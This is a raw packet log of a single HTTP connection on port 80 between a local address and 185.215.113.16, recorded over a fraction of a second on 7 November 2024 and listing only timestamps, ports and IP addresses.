Nov 7, 2024 04:12:28.282027960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282047033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282058954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282068968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282080889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282092094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282095909 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282103062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282116890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282131910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282145977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282171011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282176971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282221079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282291889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282305956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282337904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282346964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282349110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282360077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282380104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282382965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282394886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282406092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282407999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282417059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282428026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282438040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282438040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282457113 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282459974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282471895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282480955 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282494068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282495022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282505989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282516003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282517910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282529116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282536983 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282573938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282599926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282610893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282620907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282633066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282648087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282655001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282675028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282685995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282685995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282700062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282711983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282720089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282751083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282759905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282771111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282783031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282793999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282807112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282810926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282826900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282852888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282855034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282866955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282876968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282888889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282902956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282907963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282924891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282928944 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282938004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282949924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282953978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282963037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.282968044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.282999992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283073902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283086061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283096075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283118963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283132076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283138990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283144951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283155918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283168077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283170938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283185005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283216953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283243895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283256054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283267975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283289909 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283293962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283308029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283323050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283332109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283340931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283349037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283360958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283373117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283380032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283384085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283396959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283417940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283442020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283494949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283509016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283534050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283544064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283555031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283559084 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283565998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283567905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283579111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283590078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283591032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283601999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283613920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283623934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283647060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283653975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283660889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283668995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283691883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283703089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283715010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283723116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283726931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283740044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283751965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283756971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283761978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283766985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283786058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283790112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283799887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283808947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283812046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283821106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283830881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283835888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283843040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283854961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283868074 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283876896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283880949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283896923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283901930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283907890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283921003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283926010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283935070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283935070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283947945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.283956051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.283977985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.284002066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317004919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317035913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317047119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317061901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317074060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317085028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317097902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317109108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317118883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317137003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317153931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317164898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317169905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317169905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317169905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317169905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317178011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317188978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317203999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317225933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317231894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317231894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317238092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317250013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317261934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317270994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317276001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317325115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317658901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317670107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317681074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317703962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317718029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317724943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317729950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317745924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317774057 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317878962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317894936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317905903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317914963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317919970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317925930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317948103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317964077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.317981005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.317986965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318001032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318013906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318017960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318021059 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318041086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318042994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318053007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318068981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318072081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318077087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318089962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318098068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318104029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318115950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318123102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318130970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318140984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318151951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318152905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318161964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318166018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318176985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318182945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318188906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318212032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318212032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318222046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318247080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318255901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318257093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318274975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318279982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318293095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318305969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318316936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318319082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318331957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318350077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318363905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318367004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318376064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318387985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318398952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318413973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318414927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318439007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318449974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318459988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318480015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318486929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318499088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318512917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318516016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318521976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318530083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318542004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318552017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318553925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318564892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318578005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318574905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318588018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318603039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318624973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318629026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318640947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318650961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318654060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318664074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318666935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318676949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318686962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318694115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318697929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318710089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318718910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318722010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318732023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318749905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318759918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318762064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318768978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318775892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318788052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318798065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318806887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318830013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318836927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318841934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318845034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318849087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318856001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318867922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318892956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318906069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318917036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318928957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318931103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318957090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318960905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318974018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.318984032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.318988085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319006920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319015026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319026947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319032907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319040060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319051027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319061041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319066048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319072008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319092989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319130898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319156885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319175959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319230080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319238901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319250107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319271088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319276094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319288015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319298029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319299936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319318056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319335938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319335938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319350004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319372892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319389105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319391966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319401026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319406033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319416046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319434881 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319461107 CET	49762	80	192.168.2.4	185.215.113.16
